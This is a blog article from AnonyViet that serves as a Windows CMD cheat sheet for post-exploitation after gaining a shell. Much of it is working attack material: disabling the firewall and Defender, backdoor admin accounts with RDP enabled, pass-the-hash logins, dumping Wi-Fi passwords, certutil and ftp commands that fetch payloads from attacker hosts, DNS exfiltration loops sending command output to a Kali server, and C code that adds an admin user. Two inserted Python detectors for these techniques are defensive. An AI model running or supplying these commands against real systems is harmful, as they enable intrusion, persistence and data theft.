
If you want to hack Windows you need to know these CMD commands

AnonyViet by AnonyViet
January 26, 2023
in Security

In this article I will list the most common and basic CMD commands that Windows pentesters use. Because this article is very technical in nature, I will not explain each command in detail, only briefly what it does. If a command does not work, either (1) you typed the syntax wrong, or (2) the command is not installed on the system and so cannot be used.



System-related CMD commands for Pentester

First of all, why do you need to know these basic commands when hacking into Windows? Because once you have a shell on a Windows machine, the next things you need to do are turn off the firewall, create a backup user so you can log in again later, and so on.

So mastering the commands below will save a pentester time when exploiting Windows vulnerabilities.


Version and patch information

View system architecture: wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture

Full system information: systeminfo

View OS name and version: systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

View patch: wmic qfe get Caption,Description,HotFixID,InstalledOn

Hostname: hostname

View third-party drivers: DRIVERQUERY 

Environment

List all environment variables: set

Some env variables to know:

  • COMPUTERNAME: Computer name
  • TEMP/TMP: Temp folder (where temporary files are saved)
  • USERNAME: Username
  • HOMEPATH/USERPROFILE: Home directory
  • windir: C:\Windows
  • LOGONSERVER: Name of the domain controller
  • USERDNSDOMAIN: DNS name of the domain
  • USERDOMAIN: Domain name

DNS lookup of the domain controller: nslookup %LOGONSERVER%.%USERDNSDOMAIN%

Connected drives

wmic logicaldisk get caption
wmic logicaldisk get caption,description,providername

Anti Virus

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
sc query windefend
Remove all Defender definitions (intended for machines without internet access): "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

Recycle Bin

dir C:\$Recycle.Bin /s /b

Processes, Services & Software

Details of scheduled tasks:

schtasks /query /fo LIST /v
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt
cat schtasks.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM #grep the exported file on a Linux host

List of processes: tasklist /V

Processes hosting services: tasklist /SVC

Active Windows Services: net start

List of services: wmic service list brief or sc query

Installed 64-bit software: dir /a "C:\Program Files"

Installed 32-bit software: dir /a "C:\Program Files (x86)"

Installed software: reg query HKEY_LOCAL_MACHINE\SOFTWARE

Domain Information

echo %USERDOMAIN% #Domain name
echo %USERDNSDOMAIN% #DNS domain name when the computer is joined to a domain
echo %logonserver% #Domain controller name
set logonserver #Domain controller name
set log #Domain controller name
net groups /domain #List of domain groups
net group "domain computers" /domain #List of PCs joined to the domain
net view /domain #List of PCs in the domain
nltest /dclist:<DOMAIN> #List of domain controllers
net group "Domain Controllers" /domain #List of computer accounts of the domain controllers
net group "Domain Admins" /domain #List of users with domain admin privileges
net localgroup administrators /domain #List of admin groups inside the domain (including the "Domain Admins" group)
net user /domain #List of all domain users
net user <ACCOUNT_NAME> /domain #Information about a user
net accounts /domain #View the domain's current password and logon limits
nltest /domain_trust #Map domain trust relationships

Logs & Events

Query the Security event log with explicit credentials (here against the remote host helpline): wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321

Users & Groups

Users

whoami /all #All information about you
whoami /priv #Show only privileges
net users #All users
dir /b /ad "C:\Users" #User profile folders
net user %username% #Information about the current user (you)
net accounts #Password policy information
qwinsta #Is anyone else logged in?
cmdkey /list #List of stored credentials
net user /add [username] [password] #Create a user

#Open a new cmd.exe with new creds (to impersonate on the network)
runas /netonly /user:<USERNAME>\administrator cmd

#Check the current logon sessions as administrator using logonsessions from Sysinternals. Read more here
logonsessions.exe
logonsessions64.exe

Groups

#Local
net localgroup #All existing groups
net localgroup Administrators #Information about a group (admins)
net localgroup administrators [username] /add #Add a user to administrators

#Domain
net group /domain #Information about domain groups
net group /domain <domain_group_name> #Users belonging to the group

List of sessions

qwinsta
klist sessions

Password Policy

net accounts

Add users to the group

# Add a domain user to the Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Add a local user to the local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# Add a user to other groups:
net localgroup "Remote Desktop Users" UserLoginName /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add

Network

Interfaces, Routes, Ports, Hosts and DNSCache

ipconfig /all #Information about interfaces
route print #View current routes
arp -a #Information about hosts
netstat -ano #Open ports
type C:\WINDOWS\System32\drivers\etc\hosts #Static hosts file
ipconfig /displaydns | findstr "Record" | findstr "Name Host" #DNS cache

Firewall

Information about the firewall and open ports:

netsh firewall show state
netsh advfirewall firewall show rule name=all
netsh firewall show config # Firewall information
Netsh Advfirewall show allprofiles

Turn the firewall off and on:

NetSh Advfirewall set allprofiles state off #Turn off the firewall
NetSh Advfirewall set allprofiles state on #Turn on the firewall
netsh firewall set opmode disable #Turn off the firewall (legacy syntax)

How to open ports:

netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"

Enable Remote Desktop:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"

::netsh firewall set service remotedesktop enable #Not necessary
::sc config TermService start= auto #Not necessary
::net start Termservice #Not necessary

Turn on Remote Assistance:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

Ninja combo (new admin user, allow RDP + Remote Assistance + firewall):

net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

Connect to RDP (using hash or password):

xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
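From the defender's side, the combo above leaves a tight sequence of events: an account is created, it is added to Administrators, and fDenyTSConnections is written to 0. The following Python is an added example (not code from the original article) that correlates those three events on one host; the event records are constructed and simplified into flat dicts (field names "key"/"value" stand in for Sysmon's TargetObject/Details), while the event IDs are the real Windows ones.

```python
"""Correlate Windows events into an alert for: local user created (4720) ->
added to Administrators (4732) -> RDP enabled (Sysmon 13 zeroing
fDenyTSConnections), all within a short window on the same host.
Added example; records below are constructed and simplified."""
from datetime import datetime, timedelta

# Real IDs: Security 4720 = user created, Security 4732 = member added to a
# security-enabled local group (needs "Audit Security Group Management"),
# Sysmon 13 = registry value set (needs a Sysmon rule for the Terminal Server key).
SAMPLE_EVENTS = [  # constructed
    {"t": "2023-01-26T10:00:01", "id": 4720, "host": "WS01",
     "subject": "CORP\\bob", "target": "hacker"},
    {"t": "2023-01-26T10:00:02", "id": 4732, "host": "WS01",
     "subject": "CORP\\bob", "target": "hacker", "group": "Administrators"},
    {"t": "2023-01-26T10:00:03", "id": 13, "host": "WS01", "subject": "CORP\\bob",
     "key": "HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\fDenyTSConnections",
     "value": "DWORD (0x00000000)"},
    # partial chain on another host: account created but never made admin
    {"t": "2023-01-26T11:30:00", "id": 4720, "host": "WS02",
     "subject": "CORP\\helpdesk", "target": "svc_backup"},
]
RDP_KEY = "terminal server\\fdenytsconnections"
WINDOW = timedelta(minutes=10)

def _t(ev):
    return datetime.fromisoformat(ev["t"])

def rdp_enabled(ev):
    """Sysmon 13 writing 0 to fDenyTSConnections (Details shows a DWORD)."""
    val = ev.get("value", "")
    return (ev["id"] == 13 and ev.get("key", "").lower().endswith(RDP_KEY)
            and ("0x00000000" in val or val.strip() == "0"))

def find_persistence_chains(events, window=WINDOW):
    """One alert per 4720 whose account is made admin and RDP is enabled
    on the same host within `window`."""
    alerts = []
    for created in (e for e in events if e["id"] == 4720):
        t0 = _t(created)
        later = [e for e in events
                 if e["host"] == created["host"] and t0 <= _t(e) <= t0 + window]
        made_admin = any(e["id"] == 4732 and e.get("target") == created["target"]
                         and e.get("group", "").lower() == "administrators" for e in later)
        if made_admin and any(rdp_enabled(e) for e in later):
            alerts.append({"host": created["host"], "user": created["target"],
                           "by": created["subject"], "start": created["t"]})
    return alerts

if __name__ == "__main__":
    for a in find_persistence_chains(SAMPLE_EVENTS):
        print(f"ALERT {a['host']}: {a['by']} created {a['user']} at {a['start']}, made it admin, enabled RDP")
```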

Share

net view #Get the list of computers
net view /all /domain [domainname] #Shares on the domain
net view \\computer /ALL #List the shares of a computer
net use x: \\computer\share #Map drive x: to a share
net share #Check current shares

WIFI

netsh wlan show profile #View the SSIDs of previously connected Wi-Fi networks

netsh wlan show profile <SSID> key=clear #View the Wi-Fi password

SNMP

Read this article to learn what SNMP is.

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

Network Interfaces

ipconfig /all

ARP

arp -a

Download

Bitsadmin.exe

bitsadmin /create 1
bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe
bitsadmin /RESUME 1
bitsadmin /complete 1

CertReq.exe

CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt

Certutil.exe

certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe

Desktopimgdownldr.exe

set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://domain.com:8080/file.ext /eventName:desktopimgdownldr

Diantz.exe

diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab

Esentutl.exe

esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o

Expand.exe

expand \\webdav\folder\file.bat c:\ADS\file.bat

Extract32.exe

extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt

Findstr.exe

findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe

Ftp.exe

cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"

GfxDownloadWrapper.exe

C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"

Hh.exe

HH.exe http://some.url/script.ps1

ieexec.exe

ieexec.exe http://x.x.x.x:8080/bypass.exe

Makecab.exe

makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab

MpCmdRun.exe

MpCmdRun.exe -DownloadFile -url <URL> -path <path> //Windows Defender executable

Replace.exe

replace.exe \\webdav.host.com\foo\bar.exe c:\outdir /A

Excel.exe

Excel.exe http://192.168.1.10/TeamsAddinLoader.dll

Powerpnt.exe

Powerpnt.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Squirrel.exe

squirrel.exe --download [url to package]

Update.exe

Update.exe --download [url to package]

Winword.exe

winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"

Wsl.exe

wsl.exe --exec bash -c 'cat < /dev/tcp/192.168.1.10/54 > binary'

Misc

cd #Current path
cd folder #Enter a folder
dir #List the folders and files in the current path
dir /a:h <path> #List hidden files
dir /s /b #All paths under the current directory, recursively
time #Current time
date #Current date
shutdown /r /t 0 #Restart the computer immediately
type <file> #Read a file

Runas

runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" #Use saved credentials
runas /netonly /user:<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted for

Hide files

attrib +h file #Hide the file
attrib -h file #Unhide the file

Give full control of a file to a user

icacls <FILE_PATH> /t /grant <USERNAME>:F #Grant full control, recursively
icacls <FILE_PATH> /remove <USERNAME> #Remove the user's permissions

Recursively copy files

xcopy /h /i /e /v /r /y C:\Users\security\.yawcam \\10.10.14.13\name\win

ADS (What is ADS?)

dir /r #Detect ADS
more < file.txt:ads.txt #Read ADS
powershell (Get-Content file.txt -Stream ads.txt)

Listening on URL ACLs

You can listen on http://+:80/Temporary_Listen_Addresses/ without admin rights; check the reserved URLs with:
netsh http show urlacl

DNS shell

Use one of the following two options on the listening (Kali) host:

sudo responder -I <iface> #Active
sudo tcpdump -i <iface> -A udp and dst port 53 and dst host <KALI_IP> #Passive

Victim

The for /f tokens trick: it lets me execute a command, take the first X words of each output line and send them via DNS to my server.

for /f %a in ('whoami') do nslookup %a <IP_kali>
for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali>
for /f "tokens=1,2,3" %a in ('dir /B C:\') do nslookup %a.%b.%c <IP_kali> #List directories
for /f "tokens=1,2,3" %a in ('dir /B "C:\Program Files (x86)"') do nslookup %a.%b.%c <IP_kali> #List those directories
for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_kali> #Same as the previous command
#More complex commands
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same idea as the previous command, with more tokens

You can also redirect the output to a file and then read it.

whoami /priv | findstr "Enab" > C:\Users\Public\Documents\out.txt
for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
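On the wire, the loops above produce query names made of command-output words joined with dots, with a literal %b or %c wherever a line had fewer tokens than requested. The following Python is an added example (not from the original article) that flags such names in a resolver log and recovers the text that was sent; the log lines are constructed in a simplified "<time> <src_ip> <qname>" form (assumption: your DNS or Sysmon Event 22 log can be mapped onto those three fields).

```python
"""Flag DNS queries shaped like the for /f ... nslookup %a.%b.%c exfil:
dotted command-output words with no real suffix, or literal %b/%c from
unset tokens. Added example; the log below is constructed."""
import re
from collections import defaultdict

SAMPLE_DNS_LOG = """\
2023-01-26T10:00:01 10.11.1.49 www.microsoft.com
2023-01-26T10:00:02 10.11.1.49 SeChangeNotifyPrivilege.Bypass.traverse.checking.Enabled
2023-01-26T10:00:02 10.11.1.49 SeImpersonatePrivilege.Impersonate.a.client.after.authentication.Enabled
2023-01-26T10:00:03 10.11.1.49 Program.Files.%c
2023-01-26T10:00:03 10.11.1.49 ws01.corp.local
2023-01-26T10:00:04 10.11.1.50 ctldl.windowsupdate.com
2023-01-26T10:00:05 10.11.1.49 Windows.%b.%c
"""  # constructed: two hosts, 10.11.1.49 is running the for /f loops

KNOWN_SUFFIXES = (".com", ".net", ".org", ".local", ".arpa")  # extend with your own zones
BAD_CHARS = re.compile(r"[^A-Za-z0-9._-]")  # '_' stays legal for _ldap._tcp SRV names

def is_suspicious(qname):
    """Heuristic: names built from command output rather than real hostnames."""
    if BAD_CHARS.search(qname):                  # e.g. '%c' left by an unset token
        return True
    if qname.lower().endswith(KNOWN_SUFFIXES):   # ordinary lookups end in a real suffix
        return False
    labels = qname.split(".")
    mixed = sum(1 for l in labels if l != l.lower() and l != l.upper())  # CamelCase words
    return bool(len(labels) >= 3 or (len(labels) >= 2 and mixed) or max(map(len, labels)) > 15)

def recover_text(qname):
    """Undo the %a.%b.%c join for triage: the text that actually left the host."""
    return " ".join(l for l in qname.split(".") if not l.startswith("%"))

def detect_exfil(log_text, threshold=3):
    """Group suspicious queries by source IP; report sources at or above threshold."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split(maxsplit=2)
        if len(parts) == 3 and is_suspicious(parts[2]):
            hits[parts[1]].append(parts[2])
    return {src: names for src, names in hits.items() if len(names) >= threshold}

if __name__ == "__main__":
    for src, names in detect_exfil(SAMPLE_DNS_LOG).items():
        print(src, "->", [recover_text(n) for n in names])
```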

Calling CMD from C code

#include <stdio.h>
#include <stdlib.h>

// When run by an Admin, this program creates a user and then adds it to the Administrators group
// Build: i686-w64-mingw32-gcc addmin.c -o addmin.exe
// Pack:  upx -9 addmin.exe

int main(void) {
    int i;
    i = system("net users otherAcc 0TherAcc! /add");
    if (i != 0) {
        fprintf(stderr, "net user failed (%d)\n", i);
        return 1;
    }
    i = system("net localgroup administrators otherAcc /add");
    return i == 0 ? 0 : 1;
}

The above are the basic pentest CMD commands for Windows. Those who want to learn more about pentesting can join AnonyViet's new Discord server.
